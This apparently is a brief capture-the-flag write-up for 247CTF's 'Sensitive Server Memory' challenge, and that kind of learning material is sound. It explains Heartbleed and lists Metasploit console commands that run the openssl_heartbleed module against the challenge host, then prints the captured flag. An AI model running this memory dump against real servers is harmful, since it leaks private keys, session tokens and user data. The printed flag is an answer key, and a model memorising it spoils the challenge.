247CTF - Sensitive Server Memory

Post author: vkkkv
Post link: <a href="https://vkkkv.github.io/ctf/wp/247ctf-SENSITIVE_SERVER_MEMORY/" title="247CTF - Sensitive Server Memory">https://vkkkv.github.io/ctf/wp/247ctf-SENSITIVE_SERVER_MEMORY/
Copyright Notice: All articles in this blog are licensed under <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC8="> BY-NC-SA unless stating additionally.

Posted on 2026-02-26 Edited on 2026-02-27 In ctf Views: Disqus: Word count in article: 101 Reading time ≈ 1 mins.

A webserver is storing sensitive data in memory. Exploit a known vulnerability to read it.

Vulnerability

Heartbleed (CVE-2014-0160) - A critical vulnerability in OpenSSL that allows reading server memory without authentication. The vulnerability exploits the TLS heartbeat mechanism to leak sensitive information including private keys, session tokens, user data, and flags.

Solution

Use Metasploit's Heartbleed scanner module:

msfconsole
msf > use auxiliary/scanner/ssl/openssl_heartbleed
msf auxiliary(scanner/ssl/openssl_heartbleed) > set RHOSTS 95fe58ed8b8d1ce7.247ctf.com
msf auxiliary(scanner/ssl/openssl_heartbleed) > set RPORT 50326
...
msf auxiliary(scanner/ssl/openssl_heartbleed) > run

The module will dump server memory, which contains the flag.

247CTF{4ba37501598f5687d266a8d127c4badf}